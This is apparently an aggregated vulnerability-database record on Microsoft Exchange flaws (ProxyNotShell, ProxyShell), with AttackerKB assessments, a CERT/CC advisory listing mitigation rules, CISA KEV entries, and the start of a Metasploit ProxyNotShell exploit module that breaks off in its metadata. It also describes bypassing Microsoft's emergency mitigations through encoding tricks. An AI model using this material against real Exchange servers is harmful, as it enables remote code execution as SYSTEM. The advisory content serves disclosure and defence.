Exchange Server 2019 (version 15.2+). A new gadget chain could potentially be developed to exploit these older versions.\n\nGTSC originally announced on September 28th that they had seen a new (at the time) 0-day attack against their customers using Microsoft Exchange. On November 8th, Microsoft released patches for the two vulnerabilities. Between September 28th and November, no public exploits combined the SSRF with the RCE. Private threat actors however were attempting to exploit the vulnerability which led Microsoft to issue Exchange Emergency Mitigation Service (EEMS) mitigations. These mitigations took the form of IIS rewrite rules which were able to be bypassed using encoding techniques. 
The last issued EEMS mitigation was able to be successfully bypassed by using IBM037v1 encoding, which can be demonstrated using the [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/17275>).\n\nSuccessful code execution results in OS commands running as NT AUTHORITY\\SYSTEM. The exploit is reliable to exploit and pretty quick (compared to ProxyShell which needed to gather a lot of information).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-41082", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-08T00:00:00", "id": "AKB:B18222FB-1EF5-4D55-899B-61BD7ECF0FAA", "href": "https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-19T18:17:54", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed 
Attacker Value: 0 \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-41040", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-08T00:00:00", "id": "AKB:9EA74C88-E0C0-4B13-802D-551307F35B3F", "href": "https://attackerkb.com/topics/jd9xHGqW3a/cve-2022-41040", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T23:21:43", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 10, 2023 3:53pm UTC reported:\n\nThis is an alternative method for bypassing Exchange Emergency Mitigation Service (EEMS) protections for the ProxyNotShell exploit chain. When this CVE is combined with [CVE-2022-41082](<https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082>), they yield code execution as NT AUTHORITY\\SYSTEM.\n\nInstalling the original patches from Microsoft that were released in November fix this exploit chain as well. 
The technique is arguably redundant when EEMS can be bypassed using various encoding techniques. This alternative vector is likely most valuable when used to avoid generating exploitation following the original pattern.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-09T00:00:00", "type": "attackerkb", "title": "CVE-2022-41080", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-07-11T00:00:00", "id": "AKB:3A0452AA-1A50-41D3-943C-085C00734C11", "href": "https://attackerkb.com/topics/C0uaKiuXUX/cve-2022-41080", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T23:18:13", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 14, 2021 7:15pm UTC reported:\n\nThis remote code execution (RCE) vulnerability affects Microsoft Exchange Server 2013/ CU23/2016 CU20/2016 CU21/2019 CU10. 
\nAnd according to FireEye exploit code is available. \nI will share more information once MSFT releases more details\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-31206", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-09-21T00:00:00", "id": "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "href": "https://attackerkb.com/topics/oAhIZujU2O/cve-2021-31206", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T17:21:09", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at July 14, 2021 5:15pm UTC reported:\n\nFrom <https://blog.talosintelligence.com/2021/07/microsoft-patch-tuesday-for-july-2021.html> there was a note that this vulnerability seems to have been used in some Exchange Server APT attacks detailed at 
<https://blog.talosintelligence.com/2021/03/hafnium-update.html> however it wasn\u2019t disclosed that this vulnerability was patched despite being patched back in April 2021. Since this was under active exploitation it is recommended to patch this vulnerability if you haven\u2019t applied April 2021\u2019s patch updates already.\n\nSuccessful exploitation will result in RCE on affected Exchange Servers, and requires no prior user privileges, so patch this soon!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-34473", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-20T00:00:00", "id": "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "href": "https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-07T00:04:03", "description": "ProxyShell is an exploit chain targeting on-premise installations of 
Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n\nDetails are available in Orange Tsai\u2019s [Black Hat USA 2020 talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) and follow-on [blog series](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>). ProxyShell is being broadly exploited in the wild as of August 12, 2021.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at August 12, 2021 9:19pm UTC reported:\n\nCheck out the [Rapid7 analysis](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I\u2019d imagine folks are going to start finding ways around that soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "attackerkb", "title": "ProxyShell Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "href": "https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2023-08-11T23:30:10", "description": "### Overview\n\nMicrosoft Exchange Server 2019, Exchange Server 2016 and Exchange Server 2013 are vulnerable to a server-side request forgery (SSRF) attack and remote code execution. An authenticated attacker can use the combination of these two vulnerabilities to elevate privileges and execute arbitrary code on the target Exchange server. \n\n### Description\n\nMicrosoft Exchange Server's [ Autodiscover service](<https://learn.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>) is a web service widely available to any Microsoft Exchange Web Services (EWS) client. Since Microsoft Exchange version 2016, the Autodiscover service has become an integral part of the Microsoft Exchange system, and it is no longer independently provided by a Client Access server. The Autodiscover service and a number of other privileged mailbox services are hosted on the default Internet Information Services server running on the Mailbox server. 
\n\nCybersecurity company GTSC [observed an abuse of the Autodiscover service in August of 2022](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using a crafted URL SSRF attack, similar to the earlier [ProxyShell](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) vulnerability reported in August 2021. The observed attack appears to have implemented [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) to gain privileged access and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) to perform remote code execution via PowerShell. Microsoft Security Research Center has [acknowledged the vulnerability and provided guidance for mitigation](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). The guidance highlights that Microsoft Exchange Online customers will be provided with detection and mitigation defenses automatically from Microsoft's managed infrastructure, informing them of any attempts to exploit these vulnerabilities. \n\n### Impact\n\nAn authenticated remote attacker can perform SSRF attacks to escalate privileges and execute arbitrary PowerShell code on vulnerable Microsoft Exchange servers. As the attack is targeted against the Microsoft Exchange Mailbox server, the attacker can potentially gain access to other resources via lateral movement into Exchange and Active Directory environments.\n\n### Solution\n\n#### Workaround guidance\n\nMicrosoft has provided guidance in their [recent blog post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) to address the issue. 
Note that Microsoft has updated their guidance for the Option 3 Step 6 with the URL filter to be _.*autodiscover\\\\.json.*Powershell.*_ (excluding the _@_ symbol) instead of the earlier _.*autodiscover\\\\.json.*\\@.*Powershell.*_. The recommended block pattern is a regular expression suggested by [Jang](<https://twitter.com/testanull>) to prevent known variants of the #ProxyNotShell attacks. Microsoft further updated their advisory on October 8th, suggesting that the **Condition Input** should be changed from {URL} to {UrlDecode:{REQUEST_URI}} to ensure all encoded variations are evaluated before being blocked.\n\n#### Apply update when available\n\nAs of October 3, 2022, there is no patch available to mitigate this issue. It is recommended that Microsoft Exchange administrators stay on alert for any advisory or patch released by Microsoft. Note the latest security updates from Microsoft on [October 11th](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>) **do not** address the vulnerabilities highlighted here. Even with the workaround in place, many on-premise Microsoft Exchange instances remain at risk until Microsoft provides a patch and the patch has been applied.\n\nOn November 8th 2022, Microsoft provided fixes as part of its Patch Tuesday rollout; see Microsoft's updated guidance at [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) and [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>). 
\n\n#### Third-party web application protection\n\nExchange Administrators who use third-party Web Application Firewall (WAF) products can implement the recommended URL filters and blocks as part of their WAF policy.\n\n#### Other mitigations\n\nExchange Administrators can limit outgoing connections from the Exchange Mailbox server using a specific allow list on an outgoing proxy to limit suspicious web requests.\n\nThis document was written by Vijay Sarvepalli.\n\n### Vendor Information\n\n915563\n\n### Microsoft Unknown\n\nNotified: 2022-10-03 Updated: 2022-10-03 **CVE-2022-41040**| Unknown \n---|--- \n**CVE-2022-41082**| Unknown \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Microsoft Vulnerability Research Unknown\n\nNotified: 2022-10-03 Updated: 2022-10-04 **CVE-2022-41040**| Unknown \n---|--- \n**CVE-2022-41082**| Unknown \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### References\n\n * <https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>\n * <https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>\n * <https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>\n * <https://rw.md/2022/11/09/ProxyNotRelay.html>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-41040 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-41040>) [CVE-2022-41082 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-41082>) \n---|--- \n**API URL: ** | VINCE JSON | CSAF \n**Date Public:** | 
2022-10-03 \n**Date First Published:** | 2022-10-03 \n**Date Last Updated: ** | 2022-11-10 01:59 UTC \n**Document Revision: ** | 9 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "cert", "title": "Microsoft Exchange vulnerable to server-side request forgery and remote code execution.", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-10T01:59:00", "id": "VU:915563", "href": "https://www.kb.cert.org/vuls/id/915563", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-08-11T21:25:24", "description": "Microsoft Exchange Server allows for server-side request forgery. 
Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41082 which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Server-Side Request Forgery Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-41040", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T21:25:24", "description": "Microsoft Exchange Server contains an unspecified vulnerability which allows for authenticated remote code execution. 
Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41040 which allows for the remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-41082", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-34473", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation. 
This vulnerability is chainable with CVE-2022-41082, which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-01-10T00:00:00", "id": "CISA-KEV-CVE-2022-41080", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-11-30T21:04:16", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-30T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 
ProxyNotShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-30T00:00:00", "id": "PACKETSTORM:170066", "href": "https://packetstormsecurity.com/files/170066/Microsoft-Exchange-ProxyNotShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::HTTP::Exchange \ninclude Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyNotShell RCE', \n'Description' => %q{ \nThis module chains two vulnerabilities on Microsoft Exchange Server \nthat, when combined, allow an authenticated attacker to interact with \nthe Exchange Powershell backend (CVE-2022-41040), where a \ndeserialization flaw can be leveraged to obtain code execution \n(CVE-2022-41082). This exploit only support Exchange Server 2019. \n \nThese vulnerabilities were patched in November 2022. 
\n}, \n'Author' => [ \n'Orange Tsai', # Discovery of ProxyShell SSRF \n'Spencer McIntyre', # Metasploit module \n'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis \n'Piotr Bazyd\u0142o', # Vulnerability analysis \n'Rich Warren', # EEMS bypass via ProxyNotRelay \n'Soroush Dalili' # EEMS bypass \n], \n'References' => [ \n[ 'CVE', '2022-41040' ], # ssrf \n[ 'CVE', '2022-41082' ], # rce \n[ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ], \n[ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ], \n[ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ], \n[ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ] \n], \n'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], 